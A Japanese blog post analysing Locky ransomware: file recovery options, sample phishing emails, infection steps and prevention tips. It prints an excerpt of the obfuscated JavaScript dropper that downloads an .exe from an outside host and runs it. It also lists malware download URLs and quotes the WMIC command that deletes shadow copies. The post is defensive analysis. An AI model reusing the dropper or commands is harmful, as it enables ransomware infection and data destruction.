      暗号化されたファイルの復旧する 3 つの方法を紹介します。

      (1) バックアップから復旧

      バックアップから復旧することが一番簡単な方法です。ランサムウェアの被害に限らず、インシデントが発生するとバックアップの大切さがわかります。

      (2) ボリュームシャドーコピーからの復旧

      Vista/7 以降のWindowsは、標準でファイルの自動バックアップサービスが動いています。ファイルのプロパティのタブで「以前のバージョン」で表示されるものがバックアップされたファイルになります。

      いつの時点のボリュームシャドーコピーがあるかなどを確認する方法です。管理者権限のコマンドプロンプトで、vssadmin か wmic コマンドを実行すると表示されます。その他、エクスプローラのフォルダやファイルのプロパティから「以前のバージョン」タブを確認する方法もあります。

      > vssadmin list shadows

      > wmic.exe shadowcopys

      ボリュームシャドーコピーが残っていれば、Shadow Explorer というソフトウェア(http://www.shadowexplorer.com/)を使うことで以前のバージョンのファイルを復元することができます。

      Locky ウイルスは、感染時にボリュームシャドーコピーを削除するコマンドを実行します。このコマンドには管理者権限が必要なので、一般ユーザ権限で操作をしていたのであれば削除されずに残っている可能性があります。

      (3) アンチウイルスベンダーの復号ツールを使う(未確認)

      本当に復号できるのか確認検証できていませんが、下記URL に Locky ウイルスに暗号化されたファイルを復元する方法が記載されています。

      How to Decrypt Files Affected by Locky

      http://www.im-infected.com/virus/remove-locky-ransomware-virus-removal.html

      DrWeb の FTP サイトに復号ツール(ftp://ftp.drweb.com/pub/drweb/tools/te94decrypt.exe)があるようですが、認証が必要でダウンロードできませんでした。DrWeb を購入しているユーザのみに公開されているのかもしれません?。DrWeb のライセンスを持っていないので詳細は不明です。

      このツールを使って下記コマンドを実行することにより復号できるようです。(確認できていないので、本当に復元できるか不明です)

      te94decrypt.exe -k 85

      上記コマンドで復号できない場合は、-k オプションの値を -k 87, -k 88, -k 90, -k 106, or –k186 のように変えて試すとよいようです。

      (4) 身代金を支払う

      最後の手段ですね。

      スポンサーリンク

      4. メール添付ファイルの例

      Locky ウイルスをダウンロードする JavaScript ファイル (ZIP 圧縮ファイル)を添付したメールの一例です。以下、Locky ウイルスに関するメールの特徴です。

      • 件名は Document 2 が多い
      • 差出人と宛先が自分のメールアドレス
      • 本文はなしが多い
      • 添付ファイルは zip で Locky Virus をダウンロードする js ファイルが含まれている

       

      4.1 メール添付ファイルの例

      • Scanned images

      件名 Scanned image
      差出人 "admin" lands804@nifty.com
      日時 Fri, 11 Mar 2016 21:28:25 +0530 (IST India Standard Time)
      X-Mailer Internet FAX, MGCS
      本文 Image data in PDF format has been attached to this email.
      添付ファイル 11-03-2016-0424109259.zip (LUH5654603905.js)

      • Document 2

      件名 Document 2
      差出人 自分のメールアドレス
      日時 Fri, 18 Mar 2016 07:36:24 –0500 (EST アメリカ東部)
      X-Mailer なし
      本文 なし
      添付ファイル Document 2.zip (中身は SKS6515937204.js)

      • Message from KFBT_C125

      件名 Message from KFBT_C125
      差出人 copier@nifty.com
      日時 Date: Mon, 21 Mar 2016 10:01:42 -0700 (US,カナダ, メキシコ)
      X-Mailer KONICA MINOLTA
      本文 なし
      添付ファイル SKFBT_C0125690141.zip

      • Document 2

      件名 Document 2
      差出人 自分のメールアドレス
      日時 Tue, 22 Mar 2016 16:40:13 +0530 (IST India Standard Time インド)
      X-Mailer iPhone Mail (13B143)
      本文 なし
      添付ファイル Document 2.zip (中身は FAM6542645213.js)

      • Document 2

        
      件名 Document 2
      差出人 自分のメールアドレス
      日時 Tue, 22 Mar 2016 16:45:47 +0530 (IST India Standard Time インド)
      X-Mailer iPhone Mail (13B143)
      本文 なし
      添付ファイル Document 2.zip (中身は QVR3975568919.js)

      • Document 2

      件名 Document 2
      差出人 自分のメールアドレス
      日時 Tue, 22 Mar 2016 13:21:42 +0700 (ロシア?)
      X-Mailer iPhone Mail
      本文 なし
      添付ファイル Document 2.zip

      • Locky をダウンロードする Javascript の例(一部)

      LUH5654603905.js (一部)

      LnOKenpxqU = "If the nodes are siblings, we can do a quick check} else if ( aup === bup ) {return siblingCheck( a, b );";
      String.prototype.harmonize = function () { return this.substr(0, 1); };
      var zooFq = [("through","sesame","admissions","holes","T")+("scripts","beautify","attacked","arrangements","OQ")+("algeria","cucumber","relation","NF")+"JjAV"+"sY", "c"+("sponsorship","endorsed","finish","JbVL")+"Lh"+"xN", "Expan"+"dE"+"nviron"+"me"+"ntStri"+("stork","sluggish","foxes","ngs"), ""+"%"+("prominent","queens","foregone","susanna","TE")+"MP%", "/BhyIDtNVwP" + ""+"."+("revolve","meyer","shift","reborn","exe"), "R"+("medline","demur","arbitrator","un"), ("tumbler","dense","A")+("craig","repine","tramadol","ct")+"iv"+"eX" + ("compression","brewery","guitar","")+"O"+"bj"+"ect", "QGGOKcpS", "QwMELac", "W"+"Sc"+"ri"+("foxes","torture","pt.") + ("problem","inscribe","melissa","octave","S"), "DKiwgen", ""+("withering","andrew","shorter","h")+"ell", "pVfOLaUink", ("throttle","cowboy","")+("amalgamation","breast","u")+"gb"+"IRD", ""+("guarantee","breastplate","interpreted","M")+"SX"+"ML2" + "."+"XM"+"LH"+("freeze","pounce","immensity","taciturnity","TTP")];
      WeuTVCqwr = "Otherwise nodes in our document sort firstap[i] === preferredDoc ? -1 :bp[i] === preferredDoc ? 1 :0;};";   
      zooFq.splice(7,2);   
      var CTMoXJF = this[zooFq[7 * 8 - 50]];   
      HWKBtgugje = "QADrAWHk";   
      midnight = (("deleterious", "greenish", "bpRCgjnvY", "astuteness", "pxoHjzpzAa") + "FCIzdg").harmonize()   
      publicitys = (("compared", "cheaper", "QBuFHmOIr", "architects", "shvjRYg") + "FjirdbbvG").harmonize()   
      zooFq[7] = zooFq[7] + zooFq[9];   
      zooFq[8] = "WyGszYG";   
      zooFq.splice(8,3);   
      var SjBMgLMBX = new CTMoXJF(zooFq[7]);   
      SEVPbSzi = "}Walk down the tree looking for a discrepancywhile ( ap[i] === bp[i] ) {i++;";   
      var ivPMRM = new CTMoXJF(zooFq[9]);   
      rfQhFwb = "}Otherwise we need full lists of their ancestors for comparisoncur = a;while ( (cur = cur.parentNode) ) {ap.unshift( cur );}cur = b;while ( (cur = cur.parentNode) ) {bp.unshift( cur );";   
      var giLwRPLp = SjBMgLMBX[zooFq[2]](zooFq[3]) + zooFq[4];   
      SWlMAsjacQk = "}return i ?Do a sibling check if the nodes have a common ancestorsiblingCheck( ap[i], bp[i] ) :";   
      ivPMRM.onreadystatechange = function () {   
      if (ivPMRM[("animal","ferment","wince","r")+"ea"+("drummer","delicious","romany","thinking","dy")+"st"+("contributor","society","projects","oxygen","ate")] === 4) {   
         var aLcJyART = new CTMoXJF(""+"A"+("outlawed","mined","national","DO")+("derek","elizabethan","cleave","whisk","DB.")+("protuberance","stayed","proverbs","")+("terminus","dunno","madness","graphic","S")+"tr"+"eam");   
         aLcJyART.open();   
         KHvCvfBJOh = " return document; };";  

      try {

      LNqWai= "IE 9\"s matchesSelector returns false on disconnected nodesif ( ret || support.disconnectedMatch ||  As well, disconnected nodes are said to be in a document  fragment in IE 9 elem.document && elem.document.nodeType !== 11 ) {return ret;}} catch (e) {}";   
      ivPMRM.open(("symptom","sigma","colin","G")+"ET", "h"+("propagate","thrown","johnny","ttp:")+"//"+("mohawk","impair","chinhu")+"an"+"oi"+"that.c"+"om/s"+"ys"+"te"+"m/logs/u"+"y78hn6"+("hogshead","action","54")+"e.exe", false);BxpYFBq = "} return Sizzle( expr, document, null, [ elem ] ).length > 0; };";   
      ivPMRM[publicitys + ("illogical","quick-witted","grape","xerox","e") + (("promote", "moderately", "gnuUtaRFBS", "viscid", "impure", "nYAgsnHqfY") + "DudCuStvIn").harmonize() + (("miner", "squeal", "IKcQRgYhT", "blame", "concord", "dNdviLv") + "crpvqd").harmonize()]();   
      RqrXhxjRF = "Sizzle.contains = function( context, elem ) {Set document vars if neededif ( ( context.ownerDocument || context ) !== document ) {setDocument( context );}return contains( context, elem ); };";   
      SjBMgLMBX[zooFq[5]](giLwRPLp, 1, "qPdBvBqXfEO" === "HtIxotr"); xcwJYtK = " return val !== undefined ?val :support.attributes || !documentIsHTML ?elem.getAttribute( name ) :(val = elem.getAttributeNode(name)) && val.specified ?val.value :null; };";   
      lrGyXANbYvX = "Sizzle.attr = function( elem, name ) {Set document vars if neededif ( ( elem.ownerDocument || elem ) !== document ) {setDocument( elem );";   
      } catch (RaRfcWCIw) { };   
      xyQVrCFOYxk = "} var fn = Expr.attrHandle[ name.toLowerCase() ],Don\"t get fooled by Object.prototype properties (jQuery #13807)val = fn && hasOwn.call( Expr.attrHandle, name.toLowerCase() ) ?fn( elem, name, !documentIsHTML ) :undefined;";

      5. Locky ウイルスのダウロードURL

      メールに添付された zip ファイルに含まれる js ファイルを実行すると HTTP アクセスして、Locky Virus をダウンロード実行します。HTTPアクセス先 URL の一例です。

      hxxp://timefusewatches.com/system/logs/3523523.exe
      hxxp://palat.com/system/logs/98h7b66gb.exe
      hxxp://palahasit.com/system/logs/98h7b66gb.exe

      /system/logs/*.exe となっているURLが多いようです。

      6. Locky ウイルス感染時の動作

      メール経由(js を含む添付ファイル)での感染時の動作です。感染してファイルを暗号化された後は、Locky Virus は自身を削除してしまうため残っていません。このため、暗号化された後に、アンチウイルスソフトウェアでフルスキャンしても見つかりません。メール添付されていた zip or Javascript は残っているので、これらが検知されることはあるかもしれません。

      1. Locky Virus をダウンロードするための Javascript を圧縮した zip ファイルを添付したメールが届く
      2. 添付された zip を開いて Javascript ファイル( 例: LUH5654603905.js)を実行すると、Locky Virus である実行ファイルがダウンロード実行される
      3. Volume Shadow Copy サービスで自動バックアップされているファイルをコマンドで削除する「C:\Windows\System32\wbem\WMIC.exeshadowcopydelete/nointeractive」
      4. Locky C2 (コントロール&コマンド)サーバに通信して暗号化に関する情報をやり取り (hxxp://xxxxxxx/main.php、hxxp://xxxxxxx/gate.php へのPOST通信が多い)
      5. ファイルの暗号化処理
      6. 脅迫文を作成して表示
      7. Locky Virus の実行ファイルを削除 「"C:\Windows\system32\cmd.exe" /c DEL %USERPROFILE%\DOCUME~1\TWRPUI~1.EXE」
                 

      7. 感染しないための対策

      • Adobe Flash Player を最新バージョンにアップデートする
      • Adobe Reader を最新バージョンにアップデートする
      • Java を最新バージョンにアップデートする
      • Internet Explorer を最新バージョンにアップデートする
      • Windows Update のセキュリティパッチをすべて適用する
      • アンチウイルスソフトの最新パターンにアップデートし、リアルタイム検知を有効にする
      • 問題なければ .js 拡張子の関連付けを、Javascript が実行できないプログラム(例えばnotepad.exe など)に変更する
      • js, wsf, vbs などの関連付けを無効にする
      • js, wsf, vbs などに関連付けられた WScript.exe をグループポリシーや権限などで実行禁止する
      • Microsoft Office のマクロ設定を警告表示もしくは無効にする

      各種ソフトウェアやプラグインが最新バージョンになっているかは、情報処理推進機構 IPA が提供している MyJVN パージョンチェッカー(http://jvndb.jvn.jp/apis/myjvn/vccheck.html)で確認できます。

      8. 関連リンク

      記事一覧

      スポンサードリンク


      Twitter


      無料ブログはココログ

      ブログ検索